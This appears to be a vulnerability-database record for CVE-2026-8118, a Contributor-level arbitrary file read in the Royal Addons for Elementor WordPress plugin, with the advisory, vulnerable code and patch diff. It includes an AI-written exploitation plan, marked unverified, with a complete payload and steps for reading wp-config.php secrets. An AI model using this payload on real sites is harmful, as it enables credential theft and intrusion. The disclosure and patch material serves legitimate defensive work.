[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fDoimmW9KRcVlDZdul79PBrqzrMa6XG20S5IHVFVaVkg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-8118","royal-addons-for-elementor-addons-and-templates-kit-for-elementor-authenticated-contributor-arbitrary-file-read-via-data","Royal Addons for Elementor – Addons and Templates Kit for Elementor 1.7.1058 - 1.7.1059 - Authenticated (Contributor+) Arbitrary File Read via Data Table Widget CSV File Source","The Royal Addons for Elementor – Addons and Templates Kit for Elementor plugin for WordPress is vulnerable to Arbitrary File Read in versions 1.7.1058 through 1.7.1059. This is due to the wpr_get_csv_handle() helper (introduced in version 1.7.1058 as part of the patch for CVE-2026-6229) falling back to is_readable() and fopen($source, 'r') on the attacker-controlled settings.table_upload_csv.url value when it does not parse as an HTTP URL, with no allow-list, traversal block, or extension check. This makes it possible for authenticated attackers, with Contributor-level access and above, to save a crafted wpr-data-table widget through Elementor's save_builder endpoint and have the rendered preview return the line-by-line contents of any file readable by the PHP process, including wp-config.php.","royal-elementor-addons",null,">=1.7.1058 \u003C=1.7.1059","1.7.1060","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","External Control of File Name or Path","2026-06-18 16:21:26","2026-06-19 04:31:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd7ce047b-3cd3-475b-9a9f-38d15174e7e5?source=api-prod",1,[22,23,24,25],"admin\u002Fincludes\u002Fwpr-render-templates.php","modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php","readme.txt","wpr-addons.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-8118\n\n## 1. Vulnerability Summary\n**CVE-2026-8118** is an **Authenticated (Contributor+) Arbitrary File Read** vulnerability in the Royal Addons for Elementor plugin (versions 1.7.1058 - 1.7.1059). The vulnerability exists within the `Data Table` widget's CSV processing logic. Specifically, the helper function `wpr_get_csv_handle()` (introduced as a partial fix for a previous SSRF\u002FLFI) fails to properly validate the `table_upload_csv` URL setting. When the provided string does not resolve as a standard HTTP URL, the function falls back to opening it as a local file using `fopen()`. Because there are no path traversal filters or allow-lists, a user with Contributor-level access can specify sensitive local files (e.g., `wp-config.php`), which are then parsed and rendered as table data in the Elementor preview or the published post.\n\n## 2. Attack Vector Analysis\n*   **Target Endpoint:** `wp-admin\u002Fadmin-ajax.php` (Action: `elementor_ajax`) or the REST API equivalent `wp-json\u002Felementor\u002Fv1\u002Feditor\u002Fsave_builder`.\n*   **Vulnerable Widget:** `wpr-data-table`\n*   **Trigger Parameter:** `settings.table_upload_csv.url`\n*   **Authentication:** Authenticated (Contributor or higher). Contributors can create posts and edit them with Elementor.\n*   **Preconditions:** The Royal Addons for Elementor plugin must be active, and the user must have access to the Elementor editor.\n\n## 3. Code Flow\n1.  **Entry Point:** An authenticated user saves an Elementor post containing the `wpr-data-table` widget.\n2.  **Configuration:** The user sets `choose_table_type` to `pro-cv` (defined in `Wpr_Data_Table::add_control_choose_table_type()`).\n3.  **Data Persistence:** The malicious path (e.g., `\u002Fetc\u002Fpasswd`) is saved in the `table_upload_csv` control's `url` property.\n4.  **Rendering (Sink):** When the widget is rendered (either in the editor preview or front-end), the `render()` method in `modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php` is executed.\n5.  **Vulnerable Call:** The code calls `wpr_get_csv_handle($settings['table_upload_csv']['url'])`.\n6.  **The Flaw:**\n    *   The function checks if the URL is valid.\n    *   If the URL is a local path, `wp_remote_get()` fails.\n    *   The code falls back: `if ( is_readable( $source ) ) { $handle = fopen( $source, 'r' ); }`.\n7.  **Output:** The content of the file handle is iterated line-by-line, split by commas, and wrapped in `\u003Ctd>` tags, returning the file contents to the user's browser.\n\n## 4. Nonce Acquisition Strategy\nTo save the widget configuration, the Elementor `save_builder` action requires a valid WordPress nonce.\n\n1.  **Identify Shortcode:** The plugin uses `wpr-data-table`.\n2.  **Setup:** Create a dummy post to access the editor.\n    ```bash\n    wp post create --post_type=post --post_title=\"Exploit Research\" --post_status=publish --post_author=[CONTRIBUTOR_ID]\n    ```\n3.  **Navigate:** Use `browser_navigate` to the Elementor editor for that post ID: `wp-admin\u002Fpost.php?post=[ID]&action=elementor`.\n4.  **Extract Nonce:** Use `browser_eval` to extract the required nonces from the Elementor configuration object.\n    *   **Action Nonce:** `browser_eval(\"window.elementorConfig.nonces.save_builder\")`\n    *   **Editor Nonce:** `browser_eval(\"window.elementorConfig.nonces.elementor_ajax\")` (if using admin-ajax).\n\n## 5. Exploitation Strategy\nThe goal is to update a post's Elementor data to include a `wpr-data-table` widget that points to `wp-config.php`.\n\n### Step 1: Save the Malicious Widget\nSend a POST request to `admin-ajax.php` to update the post content.\n\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Payload:**\n    ```\n    action=elementor_ajax\n    &_nonce=[ELEMENTOR_AJAX_NONCE]\n    &actions={\n        \"save_builder\": {\n            \"action\": \"save_builder\",\n            \"data\": {\n                \"status\": \"publish\",\n                \"elements\": [\n                    {\n                        \"id\": \"exploit-widget-id\",\n                        \"elType\": \"widget\",\n                        \"widgetType\": \"wpr-data-table\",\n                        \"settings\": {\n                            \"choose_table_type\": \"pro-cv\",\n                            \"table_upload_csv\": {\n                                \"url\": \"\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php\"\n                            }\n                        }\n                    }\n                ]\n            }\n        }\n    }\n    &post_id=[POST_ID]\n    ```\n\n### Step 2: Retrieve the Data\nView the post or the Elementor preview to see the rendered table.\n*   **URL:** `http:\u002F\u002F[target]\u002F?p=[POST_ID]`\n*   **Action:** Search the HTML response for strings like `define(` or `DB_PASSWORD` inside `\u003Ctd>` or `\u003Ctr>` elements associated with the `wpr-data-table` CSS classes.\n\n## 6. Test Data Setup\n1.  **User:** A user with the `contributor` role.\n2.  **Target File:** Ensure `wp-config.php` exists in the standard location or use `\u002Fetc\u002Fpasswd` for general verification.\n3.  **Plugin Version:** Ensure version `1.7.1059` is installed.\n\n## 7. Expected Results\n*   The HTTP request in Step 1 should return a JSON success message: `{\"success\":true,\"data\":...}`.\n*   The front-end view of the post will display a table where each row corresponds to a line in `wp-config.php`.\n*   Example output in HTML:\n    ```html\n    \u003Ctd class=\"wpr-data-table-column\">define('DB_PASSWORD'\u003C\u002Ftd>\n    \u003Ctd class=\"wpr-data-table-column\"> 'your_password');\u003C\u002Ftd>\n    ```\n\n## 8. Verification Steps\nAfter the exploit, verify the file read via WP-CLI to confirm the path was successfully injected into the post meta:\n```bash\nwp post get [POST_ID] --field=content\n# Look for the JSON-encoded Elementor data containing the path\n```\n\n## 9. Alternative Approaches\n*   **Path Traversal:** If the absolute path is blocked, try relative paths: `..\u002F..\u002F..\u002F..\u002Fwp-config.php`.\n*   **REST API:** Instead of `admin-ajax.php`, use the `wp-json\u002Felementor\u002Fv1\u002Feditor\u002Fsave_builder` endpoint, which typically uses the `X-WP-Nonce` header.\n*   **Preview Mode:** Instead of publishing, use the `elementor_render_widget` action to trigger the file read without modifying the public-facing post content.","The Royal Addons for Elementor plugin is vulnerable to an authenticated arbitrary file read via the Data Table widget in versions 1.7.1058 to 1.7.1059. The `wpr_get_csv_handle()` function fails to restrict CSV source paths to the WordPress uploads directory, allowing attackers with Contributor-level access to read sensitive local files like wp-config.php by specifying their paths in the widget settings.","\u002F\u002F modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php (lines 2010-2022 in v1.7.1059)\n\n\tprotected function wpr_get_csv_handle( $source ) {\n\t\t\u002F\u002F ... (remote handling logic) ...\n\n\t\tif ( ! is_readable( $source ) ) {\n\t\t\treturn new \\WP_Error( 'wpr_csv_local_not_readable', esc_html__( 'Please provide a valid CSV file.', 'wpr-addons' ) );\n\t\t}\n\n\t\t$handle = fopen( $source, 'r' );\n\t\tif ( false === $handle ) {\n\t\t\treturn new \\WP_Error( 'wpr_csv_local_open_failed', esc_html__( 'Could not open the CSV file.', 'wpr-addons' ) );\n\t\t}\n\n\t\treturn $handle;\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1059\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1060\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1059\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\t2026-05-07 10:09:10.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1060\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\t2026-05-15 07:19:52.000000000 +0000\n@@ -126,11 +126,14 @@\n \t\t\t$template_slug = WPR_Conditions_Manager::header_footer_display_conditions($conditions);\n \t\t\t$template_id = Utilities::get_template_id($template_slug);\n \n+\t\t\t$show_on_canvas = get_post_meta($template_id, 'wpr_header_show_on_canvas', true);\n+\n \t\t\tif ( defined('ICL_LANGUAGE_CODE') ) {\n \t\t\t\t$default_language_code = apply_filters('wpml_default_language', null);\n \t\t\t\t$current_language_code = apply_filters('wpml_current_language', null);\n \n \t\t\t\tif ( $current_language_code && $current_language_code !== $default_language_code ) {\n+\t\t\t\t\t$show_on_canvas = 'true';\n \t\t\t\t\t$translated_id = apply_filters('wpml_object_id', $template_id, 'wpr_templates', true, $current_language_code);\n \t\t\t\t\tif ( $translated_id && (int) $translated_id !== (int) $template_id ) {\n \t\t\t\t\t\t$template_id = $translated_id;\n@@ -138,8 +141,6 @@\n \t\t\t\t}\n \t\t\t}\n \n-\t\t\t$show_on_canvas = get_post_meta($template_id, 'wpr_header_show_on_canvas', true);\n-\n \t\t\t\u002F\u002F if ( !empty($show_on_canvas) && 'true' === $show_on_canvas && 0 === strpos($template_slug, 'user-header-') ) {\n \t\t\tif ( !empty($show_on_canvas) && 'true' === $show_on_canvas && !is_null($template_slug) ) {\n \t\t\t\tUtilities::render_elementor_template($template_slug, $template_id);\n@@ -175,11 +176,14 @@\n \t\t\t$template_slug = WPR_Conditions_Manager::header_footer_display_conditions($conditions);\n \t\t\t$template_id = Utilities::get_template_id($template_slug);\n \n+\t\t\t$show_on_canvas = get_post_meta($template_id, 'wpr_footer_show_on_canvas', true);\n+\n \t\t\tif ( defined('ICL_LANGUAGE_CODE') ) {\n \t\t\t\t$default_language_code = apply_filters('wpml_default_language', null);\n \t\t\t\t$current_language_code = apply_filters('wpml_current_language', null);\n \n \t\t\t\tif ( $current_language_code && $current_language_code !== $default_language_code ) {\n+\t\t\t\t\t$show_on_canvas = 'true';\n \t\t\t\t\t$translated_id = apply_filters('wpml_object_id', $template_id, 'wpr_templates', true, $current_language_code);\n \t\t\t\t\tif ( $translated_id && (int) $translated_id !== (int) $template_id ) {\n \t\t\t\t\t\t$template_id = $translated_id;\n@@ -187,8 +191,6 @@\n \t\t\t\t}\n \t\t\t}\n \n-\t\t\t$show_on_canvas = get_post_meta($template_id, 'wpr_footer_show_on_canvas', true);\n-\n \t\t\t\u002F\u002F if ( !empty($show_on_canvas) && 'true' === $show_on_canvas && 0 === strpos($template_slug, 'user-footer-') ) {\n \t\t\tif ( !empty($show_on_canvas) && 'true' === $show_on_canvas && !is_null($template_slug) ) {\n \t\t\t\tUtilities::render_elementor_template($template_slug, $template_id);\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1059\u002Fmodules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1060\u002Fmodules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1059\u002Fmodules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php\t2026-05-07 10:09:10.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1060\u002Fmodules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php\t2026-05-15 07:19:52.000000000 +0000\n@@ -1834,6 +1834,17 @@\n \t\t\t}\n \n \t\t\t$url = $validated_url;\n+\t\t} else {\n+\t\t\t$validated_upload_url = $this->wpr_validate_uploaded_csv_url(\n+\t\t\t\tisset( $settings['table_upload_csv'] ) ? $settings['table_upload_csv'] : []\n+\t\t\t);\n+\n+\t\t\tif ( is_wp_error( $validated_upload_url ) ) {\n+\t\t\t\techo '\u003Cp class=\"wpr-no-csv-file-found\">' . esc_html( $validated_upload_url->get_error_message() ) . '\u003C\u002Fp>';\n+\t\t\t\treturn \\ob_get_clean();\n+\t\t\t}\n+\n+\t\t\t$url = $validated_upload_url;\n \t\t}\n \n \t\tif ( ! empty( $url ) ) {\n@@ -2010,11 +2021,34 @@\n \t\t\treturn $handle;\n \t\t}\n \n-\t\tif ( ! is_readable( $source ) ) {\n-\t\t\treturn new \\WP_Error( 'wpr_csv_local_not_readable', esc_html__( 'Please provide a valid CSV file.', 'wpr-addons' ) );\n+\t\t$canonical_source = realpath( $source );\n+\t\tif ( false === $canonical_source ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_local_invalid_path', esc_html__( 'Please provide a valid CSV file.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$uploads = wp_upload_dir();\n+\t\t$uploads_base = isset( $uploads['basedir'] ) ? realpath( $uploads['basedir'] ) : false;\n+\t\tif ( false === $uploads_base ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_uploads_missing', esc_html__( 'Could not validate the CSV upload directory.', 'wpr-addons' ) );\n \t\t}\n \n-\t\t$handle = fopen( $source, 'r' );\n+\t\t$normalized_source = wp_normalize_path( $canonical_source );\n+\t\t$normalized_uploads_base = trailingslashit( wp_normalize_path( $uploads_base ) );\n+\t\tif ( 0 !== strpos( $normalized_source, $normalized_uploads_base ) ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_local_outside_uploads', esc_html__( 'CSV file must be located in the uploads directory.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$sanitized_filename = sanitize_file_name( wp_basename( $normalized_source ) );\n+\t\t$file_extension = strtolower( pathinfo( $sanitized_filename, PATHINFO_EXTENSION ) );\n+\t\tif ( 'csv' !== $file_extension ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_local_invalid_extension', esc_html__( 'Only CSV files are allowed.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\tif ( ! is_readable( $canonical_source ) ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_local_not_readable', esc_html__( 'Could not read the CSV file.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$handle = fopen( $canonical_source, 'r' );\n \t\tif ( false === $handle ) {\n \t\t\treturn new \\WP_Error( 'wpr_csv_local_open_failed', esc_html__( 'Could not open the CSV file.', 'wpr-addons' ) );\n \t\t}\n@@ -2022,6 +2056,47 @@\n \t\treturn $handle;\n \t}\n \n+\tprotected function wpr_validate_uploaded_csv_url( $media_setting ) {\n+\t\tif ( ! is_array( $media_setting ) ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_invalid_upload', esc_html__( 'Please provide a valid CSV file.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$attachment_id = isset( $media_setting['id'] ) ? absint( $media_setting['id'] ) : 0;\n+\t\tif ( $attachment_id \u003C= 0 ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_missing_attachment', esc_html__( 'Please select a CSV file from the media library.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$attachment_file = get_attached_file( $attachment_id );\n+\t\tif ( ! is_string( $attachment_file ) || '' === trim( $attachment_file ) ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_invalid_attachment', esc_html__( 'Please select a valid CSV file from the media library.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$canonical_attachment_path = realpath( $attachment_file );\n+\t\tif ( false === $canonical_attachment_path ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_invalid_attachment_path', esc_html__( 'Could not resolve the selected CSV file.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$uploads = wp_upload_dir();\n+\t\t$uploads_base = isset( $uploads['basedir'] ) ? realpath( $uploads['basedir'] ) : false;\n+\t\tif ( false === $uploads_base ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_uploads_missing', esc_html__( 'Could not validate the CSV upload directory.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$normalized_attachment_path = wp_normalize_path( $canonical_attachment_path );\n+\t\t$normalized_uploads_base = trailingslashit( wp_normalize_path( $uploads_base ) );\n+\t\tif ( 0 !== strpos( $normalized_attachment_path, $normalized_uploads_base ) ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_attachment_outside_uploads', esc_html__( 'The selected file must be located in the uploads directory.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\t$sanitized_filename = sanitize_file_name( wp_basename( $normalized_attachment_path ) );\n+\t\t$file_extension = strtolower( pathinfo( $sanitized_filename, PATHINFO_EXTENSION ) );\n+\t\tif ( 'csv' !== $file_extension ) {\n+\t\t\treturn new \\WP_Error( 'wpr_csv_invalid_upload_extension', esc_html__( 'Only CSV files are allowed.', 'wpr-addons' ) );\n+\t\t}\n+\n+\t\treturn $canonical_attachment_path;\n+\t}\n+\n \tprotected function wpr_validate_remote_csv_url( $url ) {\n \t\tif ( ! is_string( $url ) || '' === trim( $url ) ) {\n \t\t\treturn new \\WP_Error( 'wpr_csv_missing_url', esc_html__( 'Please provide a CSV URL.', 'wpr-addons' ) );","An attacker with Contributor-level privileges can exploit this by creating or editing a post using the Elementor editor. They must add a 'Data Table' widget (`wpr-data-table`) and set the `choose_table_type` setting to `pro-cv`. By crafting a payload for the `table_upload_csv.url` parameter that points to a sensitive local file (e.g., `\u002Fetc\u002Fpasswd` or `..\u002F..\u002Fwp-config.php`), the attacker can save the post via Elementor's `save_builder` endpoint. When the widget is rendered in the post preview or on the front-end, the plugin uses `fopen()` to read the specified file and displays its contents within the table's cells, effectively leaking the file's data to the attacker.","gemini-3-flash-preview","2026-06-25 20:30:20","2026-06-25 20:31:24",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.7.1059","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1059","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1059.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1060","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1060.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]